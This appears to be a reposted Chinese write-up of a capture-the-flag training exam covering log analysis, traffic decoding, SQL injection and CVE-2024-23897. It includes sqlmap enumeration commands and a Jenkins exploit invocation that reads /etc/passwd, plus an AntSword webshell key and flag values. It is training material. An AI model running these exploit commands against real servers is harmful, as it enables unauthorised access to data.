内部培训测试 - 长亭科技平台

news/2024/12/22 14:14:37/文章来源:https://www.cnblogs.com/wgf4242/p/18622090

1、 日志分析2024 (100 分)简单安全杂项

0,1),1,1))=102 这些后面的数字。

flag{mayiyahei1965ae7569}

2、 事件协同与响应-考试 (200 分)中等安全杂项

蚁剑马 Key: d76R3478
flag{578530@chaitin}

3、 Misc-流量分析 (100 分)简单安全杂项\

过滤排序后为

/agent/metrics/putLines	
/upload/0	789c333430020001280094
/upload/1	789c3334b00000012e009a
/upload/2	789cb334070000ab0071
/upload/3	789c333430060001290095
/upload/4	789c3334320600012d0097
/upload/5	789c333430000001260092
/upload/6	789c33350400009d0067
/upload/7	789c33350200009e0068
/upload/8	789c33b1040000a3006e
/upload/9	789c333430020001280094
/upload/10	789c33350200009e0068
/upload/11	789c33350000009c0066
/upload/12	789c3335050000a1006b
/upload/13	789c333430040001270093
/upload/14	789c3335050000a1006b
/upload/15	789c3335070000a3006d
/upload/16	789c3335050000a1006b
/upload/17	789c33350200009e0068
/upload/18	789cb3b4000000ac0072
/upload/19	789c33350400009d0067
/upload/20	789c33350400009d0067
/upload/21	789cb334070000ab0071
/upload/22	789c3335030000a2006c
/upload/23	789c333430020001280094
/upload/24	789c333430000001260092
/upload/25	789cb3b4000000ac0072
/upload/26	789c3335030000a2006c
/upload/27	789c333430000001260092
/upload/28	789c33350400009d0067
/upload/29	789c3335030000a2006c
/upload/30	789c3335010000a0006a
/upload/31	789c333430000001260092
/upload/32	789cb334070000ab0071
/upload/33	789c3335030000a2006c
/upload/34	789c3335050000a1006b
/upload/35	789c3335030000a2006c
/upload/36	789c333430020001280094
/upload/37	789c3334320500012f0099

zlib解码。得到flag
flag{d341f427e7974b33a8fdb8d386da878f}

4、 Web-SQL注入 (200 分)中等web安全

sqlmap -u http://101.200.43.249/sql2.php/?id= --current-user
sqlmap -u http://101.200.43.249/sql2.php/?id= -D pwnhubsql2 --tables
sqlmap -u http://101.200.43.249/sql2.php/?id= -D pwnhubsql2 -T flaghahaha --columns
flag{43913e17463a90ecbebd2bdfa0ab362b}

5、 CVE-2024-23897 (200 分)中等web安全

CVE-2024-23897 -url http://59.110.164.194:8080/ -c reload-job -a /etc/passwd
flag{afc832a6-b6be-7732-fb89-deefec2a7def}
usage: CVE-2024-23897.py -u http://59.110.164.194:8080 -f /flag

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/856788.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

iPhone越狱版和免越狱版iMessages群发,iMessages短信,imessages推信群发实现原理

Apple公司全线在mac os与ios两个操作系统上内置了FaceTime与iMessage两个应用。完美替代运营商的短信与电话。并且FaceTime与iMessage的帐号不仅仅与Apple ID 绑定,同时也与使用这Apple ID的手机号码绑定,这样的漏洞自然给无孔不入的群发垃圾信息商们提供了后门。这样iPhone的…

IDEA Spring MVC配置.

参考1 https://blog.csdn.net/qq_74329022/article/details/138326488 示例 省赛 easyspring 配置。

专业数据恢复软件iFindDataRecoveryv9.2.3 绿色便携版

睿共享*关注我 前言 iFinD Data Recovery一款特别实用的数据找回工具,它很厉害,能帮你在SSD硬盘和Windows10系统上找回丢失的数据。而且,它还能深度扫描并恢复各种主流数码相机里的RAW格式照片,速度超快,用起来也很稳定顺畅,就算是新手也能轻松上手使用。 安装环境 [名称…

【Rive】Android与Rive交互

1 Android与Rive交互的常用接口 1.1 RiveAnimationView参数 <app.rive.runtime.kotlin.RiveAnimationViewandroid:id="@+id/rive_view"android:layout_width="match_parent"android:layout_height="match_parent"android:adjustViewBounds=&q…

【Rive】混合动画

1 混合动画简介 ​ 【Rive】动画 中介绍了 Rive 中动画的基础概念和一般动画的制作流程,本文将介绍混合动画的基础概念和一般制作流程。Unity 中混合动画介绍详见→ 【Unity3D】动画混合。 ​ 混合动画是指同一时刻多个动画按照一定比例同时执行,这些动画控制的动画参数…

Command-line Environment

Command-line Environment 任务控制 shell会使用UNIX提供的信号机制去执行进程间的通信,进程收到信号的时候,会基于信号改变其执行 停止 停止任务:^c 信号:SIGINT在进行find遍历目录时,使用^c,发出SIGINT到该进程,停止了该任务 课程中提供了一个脚本,忽略了SIGINT信号的…

【嵌入式开发】探讨下PC端的BLE开发

目前在嵌入式设备端,实现了不少ble的功能。比如音频传输,图片传输。一般要方便演示,需要开发个对应的手机app。但是我又是很偷懒的人。想着,python这个工具这么强大,在PC端可以用python几行代码就实现掉吧? 说干就干! 根据同事的推荐,用了python的bleak蓝牙库。 我是在…

Jmeter 修改Sampler result 结果信息

首先说一下,jmeter的Sampler result是什么? Jmeter 的Samplers result 是jmeter在向服务器发送请求后,接收到服务器响应的基本信息的展示,如 sample 的开始请求时间、发送的内容大小、基于协议的响应状态码和响应消息等信息。 什么是基于协议的响应状态码和响应消息。比如h…

Shell Script

Shell Script 赋值操作 foo=bar echo $foo注意: 不要使用空格分开shell 将会把foo当作一个程序 转义 Bash通过使用和""来定义字符串 ""会将字符串中的变量转义 echo "String is $foo"会将字符串中的变量原样输出 echo String is $foo函数 函数内…

聊一聊 C#前台线程 如何阻塞程序退出

一:背景 1. 讲故事 这篇文章起源于我的 C#内功修炼训练营里的一位朋友提的问题:后台线程的内部是如何运转的 ? ,犹记得C# Via CLR这本书中 Jeffery 就聊到了他曾经给别人解决一个程序无法退出的bug,最后发现是有一个 Backgrond=false 的线程导致的。恰巧在我分析的350+dum…

聊一聊 C#后台线程 如何阻塞程序退出

一:背景 1. 讲故事 这篇文章起源于我的 C#内功修炼训练营里的一位朋友提的问题:后台线程的内部是如何运转的 ? ,犹记得C# Via CLR这本书中 Jeffery 就聊到了他曾经给别人解决一个程序无法退出的bug,最后发现是有一个 Backgrond=false 的线程导致的。恰巧在我分析的350+dum…

offset explorer如何安装?附获取方式

前言 大家好,我是小徐啊。我们在Java开发的时候,有时候需要进行大数据的开发,或者需要使用消息队列,这个时候,就需要用到kafka这个组件了。而对于我们平常运维来说,最好有一个可视化的连接kafka的工具。今天小徐就来介绍一款连接Kafka的工具,是offset explorer,介绍下w…